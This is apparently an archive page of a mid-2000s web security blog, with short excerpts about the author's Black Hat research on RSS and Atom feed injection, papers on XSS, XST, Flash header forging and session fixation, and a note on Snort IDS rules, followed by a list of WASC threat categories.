-
Microsoft Team RSS Blog discusses more RSS Risks
The microsoft guys started a blog entry regarding my talk at blackhat/whitepaper. "We designed and implemented the RSS features using the principles of the Secure Development Lifecycle as embraced by Microsoft. One of the principles is defense in depth. The idea being, even if script somehow were to sneak by the first layer of defense,…
-
Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations
This is a copy of the slides I used at my Blackhat 2006 talk and a link to the paper accompying it. Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems (Power Point) Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations (Remote Copy)
-
RSS and Atom Security risks whitepaper is out!
I started researching RSS and Atom feed vulns last September but got distracted for 6 months or so with work/life. I've written a basic paper discussing the issues relating to Cross Site Scripting and web based feeds. I cover the risks associated with the following types of readers: * Web Based Readers (such as bloglines)…
-
Forging HTTP request headers with Flash
Amit Klein has written another fine paper involving using Flash to send http requests. "Flash player is a very popular browser add-on from Adobe (actually, Flash was invented by Macromedia, which was acquired by Adobe). This write-up covers mostly Flash 7 and Flash 8, together covering more than 94% of the Internet-enabled desktops (according to…
-
Using google to find software vulnerabilities
"Bugle is a collection of search queries which can help to identify software security bugs in source code available on the web. The list at the moment is rather small (you get the idea though), hopefully people will start sending more queries. Source code review is not a straight forward operation , using the list…
-
Zero Day Subscriptions: Using RSS and Atom feeds As Attack Delivery Systems
I will be giving a talk at Blackhat this year entitled "Zero Day Subscriptions: Using RSS and Atom feeds As Attack Delivery Systems". I'll also be available at the 'Web Application Security Consortium' Meet-up for those who want to chat. This presentation will discuss the use of RSS and Atom feeds as method of delivering…
-
Browser Fun Security Blog
"This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a…
-
Keystroke Logging Javascript
"A full disclosure post today had an exploit that used javascript in browsers to selectively "steal" keystrokes from the user typing and channeling it into the file upload field. " – ISC Article Link: http://isc.sans.org/diary.php?storyid=1386
-
Not All Banks Requiring SSL
According to news entry on DSHIELD some banks aren't requiring SSL, and even worse aren't submitting credentials over ssl. The findings can be found below. Research Finding Link: https://www.securewebbank.com/loginssluse.html
-
Misunderstanding Javascript injection: A paper on web application abuse via Javascript injection
UPDATED: 1/30/06 Response from Author "Just to inform you that the malicious code mentioned to you was actually partly research for the paper. If you take a look at the latest version (with lynx if you like), I now refer to the clipboard issue in issue 3 (this was introduced in 1.2.0 of my paper.…
-
XST Strikes Back (or perhaps “Return from the Proxy”…)
Amit Klein has written a new article entitled "XST Strikes Back (or perhaps "Return from the Proxy"…)". Whatever the final title may be it outlines how XST vulnerabilities can still exist when a proxy server is in front of the server that an attacker is wishing to launch the attack against. "About three years ago,…
-
Uninformed Online Zine #3 Released
A online zine called 'uninformed' has just released issue #3. I gotta say it's worth checking out. Below is the list of the table of contents. * Bypassing PatchGuard on Windows x64 * Windows Kernel-mode Payload Fundamentals * Analyzing Common Binary Parser Mistakes * Attacking NTLM with Precomputed Hashtables * Linux Improvised Userland Scheduler Virus…
-
Application Security Predictions For The Year 2006
In 2005 published application security vulnerabilities have exploded. If you're subscribed to mailing lists such as bugtraq you know just how often Cross Site Scripting, SQL Injection, or Remote Command Execution vulnerabilities are discovered and exploited. I've prepared a prediction outline for the year 2006 exclusively covering the threats that the web brings. Worms and…
-
PAPER: Preventing Http Session Fixation Attacks
Zinho Writes "I've published the final research about Http Session Fixation covering the most known attacks and how to prevent them. The paper is written from a web developer point of view and shows various techniques to be safe from fixation and hijacking." Paper Link: Preventing Http Session Fixation Attacks (Paper)
-
“The Anatomy of Cross Site Scripting” Paper released
libox.net has released a cross site scripting paper which provides examples of bad php code, and also talks a little bit about automating an attack. Additional papers on XSS can be found in our Cross Site Scripting section. “Cross site scripting (XSS) flaws are a relatively common issue in web application security, but they are…
-
Cgisecurity.com IDS rules used in Snort 1.8.2
I recently wrote some IDS rule sets I found to be usefulfor snort that would help detect known, and unknownport80 attacks. I submitted these rules to snort.organd they liked them so much they are now includedin the newest release.These rules were based from cgisecurity.com's paper #3which will be released later today.A copy of these new…
Favorite Links
- Security Templates (New)
- The Web Application Security Consortium
- QA Security
- The Web Security Mailing List
- Romain Gaucher’s Blog
- Jeremiah Grossman’s Blog
Popular Pages
WASC Threat Classification
- Abuse of Functionality
- Application Misconfiguration
- Brute Force Attack
- Content Spoofing
- Credential/Session Prediction
- Denial of Service
- Directory Indexing
- Information Leakage
- Remote File Inclusion Attack
- Routing Detour Attack
- SOAP Array Abuse
- XML Attribute Blowup
- XML Injection
- XML External Entity Attack